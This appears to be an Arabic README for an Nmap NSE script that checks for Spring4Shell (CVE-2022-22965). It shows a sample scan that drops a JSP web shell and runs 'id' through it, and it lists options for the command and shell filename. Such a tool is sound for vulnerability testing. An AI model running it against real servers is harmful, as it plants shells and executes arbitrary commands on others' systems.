
سكربت NSE من Nmap لثغرة Spring4Shell للتنفيذ عن بُعد (RCE) في Spring Boot (CVE-2022-22965)
Log4shell-nmap هو سكربت NSE لكشف ثغرات تنفيذ الأكواد عن بُعد (RCE) في Spring4Shell (CVE-2022-22965) عبر خدمات HTTP. يقوم السكربت بحقن الحمولة الصحيحة في التطبيق ثم ينفذ الأمر التالي على نقطة النهاية المحددة.
انظر هنا.
┌──(kali㉿kali)-[~/nmap-spring4shell]
└─$ nmap 127.0.0.1 --script=./spring4shell.nse
(...)
PORT STATE SERVICE REASON VERSION
8080/tcp open http-proxy syn-ack
| spring4shell:
| VULNERABLE:
| Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
| State: VULNERABLE
| IDs: CVE:CVE-2022-22965
| Check results:
| 127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
| Extra information:
| TESTED URL: 127.0.0.1:8080
| COMMAND: id
| ASSERTION: uid
| References:
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965
يمكننا استخدام عدة متغيرات في السكربت، وهي كالتالي:
endpoint - المسار النسبي (relative URL). على https://bugspace.pl/search/videos سيكون /search/videos،command - الأمر الذي سيتم تشغيله على الخادم. الأمر الافتراضي هو id،assertion - السلسلة النصية المفحوصة داخل استجابة الخادم. التأكيد الافتراضي هو uid،filename - اسم الملف على الخادم. لمزيد من المعلومات انظر هنا. الاسم الافتراضي هو shell.تمت الاختبارات على تطبيق من هنا وهنا
نفس ترخيص Nmap. انظر https://nmap.org/book/man-legal.html